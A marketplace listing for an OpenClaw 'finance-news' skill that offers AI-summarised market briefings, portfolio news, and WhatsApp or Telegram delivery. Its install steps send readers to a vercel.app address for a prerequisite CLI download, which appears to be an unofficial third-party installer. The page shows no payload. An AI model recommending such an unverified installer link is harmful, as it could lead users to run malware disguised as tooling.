finance-news
Market news briefings with AI summaries. Use when asked about stock news, market updates, portfolio performance, morning/evening briefings, financial headlines, or price alerts. Supports US/Europe/Japan markets, WhatsApp delivery, and English/German output.
Why use this skill?
Get personalized market news, AI-powered portfolio summaries, and automated financial briefings in English or German. Install for US, EU, and Japan market tracking.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/finance-news9What This Skill Does
The finance-news skill is a comprehensive market intelligence suite for OpenClaw users, designed to aggregate, summarize, and deliver financial insights. By leveraging advanced AI analysis, this skill transforms raw RSS feeds, market data, and ticker-specific news into digestible, actionable briefings. Whether you are tracking the S&P 500, monitoring the DAX, or keeping tabs on specific holdings, the skill provides automated updates tailored to your preferred language (English or German) and schedule. It bridges the gap between complex market noise and high-level investment signals.
Installation
Prerequisites: Ensure the OpenClawCLI is installed via https://openclawcli.vercel.app. Once installed, initialize the skill repository by running:
clawhub install openclaw/skills/skills/thiagoruss0/finance-news9
After installation, run finance-news setup to configure your preferred news sources (WSJ, Barron’s, Yahoo Finance), market regions, and delivery channels. You can use the setup flags to customize individual sections such as --section schedule or --section delivery without running the full wizard.
Use Cases
- Morning/Evening Briefings: Start or end your day with a curated AI-generated summary of market-moving events based on your specified time zone.
- Portfolio Monitoring: Automatically fetch news updates relevant to your tracked tickers by managing your portfolio via
portfolio-addorportfolio-import. - Cross-Platform Communication: Use the
--sendflag to push your daily summaries directly to WhatsApp or Telegram, ensuring you never miss a market shift while on the move. - Global Market Analysis: Access performance data across US, European, and Japanese markets with single-command insight generation.
Example Prompts
- "Give me a morning market briefing covering the US indices and any major news on my tech holdings."
- "What is the latest sentiment for NVIDIA based on today's headlines?"
- "Send a German language market summary to my finance group on WhatsApp."
Tips & Limitations
- Tip: Use the
--style analysisflag when you need deeper insights beyond simple headline aggregation. - Tip: Keep your portfolio updated using the
portfolio-importcommand to ensure the AI focus remains relevant to your actual investments. - Limitation: The skill relies on external RSS availability; ensure your network permits access to financial news domains to maintain feed integrity.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-finance-news9": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, external-api
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).